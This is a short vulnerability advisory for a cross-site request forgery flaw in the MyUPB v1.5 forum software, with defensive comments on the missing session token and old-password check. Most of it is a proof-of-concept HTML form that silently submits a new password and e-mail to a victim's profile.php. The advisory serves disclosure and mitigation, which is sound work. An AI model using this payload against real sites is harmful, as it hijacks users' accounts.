< ------------------- header data start ------------------- >


#############################################################

# Application Name : MyUPB v1.5

# Vulnerability Type : XSRF (cross-site request forgery, also written CSRF)

# Infection : Uzaktan otomatik olarak user bilgileri degistirilebilir. (Impact: a user's profile data can be changed remotely and automatically.)

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir. (A session token should be added to the form, and the old password should be asked for.)

# author : CW Bug Researchers Grup/CWCaspeR

# Demo : http://www.gislavedsguiden.nu/upb1.5/profile.php

#############################################################


< ------------------- header data end of ------------------- >


< -- bug code start -- >

<!--
  Advisory sample: the profile-edit request of MyUPB v1.5 as a static HTML form.
  It POSTs to profile.php with new-password, e-mail and other profile fields.
  The upper-case values are the author's Turkish placeholders:
  HEDEFSITE.COM = target site, SCRIPTYOLU = script path, SIFRENIZ = your password,
  EMAILINIZ = your e-mail, BUTONADI = button label.

  Why this matters for defenders: none of the fields below is a per-session
  token, and none asks for the current password. According to the advisory,
  profile.php accepts the request in this shape; that is the flaw being reported.
  A request built only from values a third party can choose cannot be told apart
  from one the logged-in user meant to send.

  Mitigation named by the advisory: bind the form to the session with an
  unpredictable token that the server checks, and require the old password
  before changing credentials. Setting SameSite on the session cookie and
  checking the Origin or Referer header of state-changing POSTs are common
  additional layers.

  NOTE(review): the attribute quotes in this copy are typographic characters,
  presumably a publishing artifact; the listing is reproduced as printed.
-->
<form action=’http://HEDEFSITE.COM/SCRIPTYOLU/profile.php’ method=’post’>
<!-- New password and its confirmation; no field for the existing password is present. -->
<input type=’hidden’ name=’u_newpass’ value=’SIFRENIZ’>
<input type=’hidden’ name=’u_newpass2’ value=’SIFRENIZ’>
<!-- Account e-mail address is part of the same request. -->
<input type=’hidden’ name=’u_email’ value=’EMAILINIZ’>
<input type=hidden name=show_email>
<input type=hidden name=email_list checked>
<!-- Remaining profile fields, sent with filler or empty values. -->
<input type=’hidden’ name=’u_loca’ value=’dasdasd’>
<input type=’hidden’ name=’avatar’ value=’images/avatars/noavatar.gif’>
<input type=’hidden’ name=’u_site’ value=’http://’>
<input type=’hidden’ name=’u_icq’ value=’’>
<input type=’hidden’ name=’u_aim’ value=’’>
<input type=’hidden’ name=’u_msn’ value=’’>
<textarea name=’u_sig’ cols=1 rows=1></textarea>
<!-- Submit control named u_edit; presumably the parameter profile.php treats as the save action (confirm against the application source). -->
<input type=’submit’ name=’u_edit’ value=’BUTONADI’>
</form>

< -- bug code end of -- >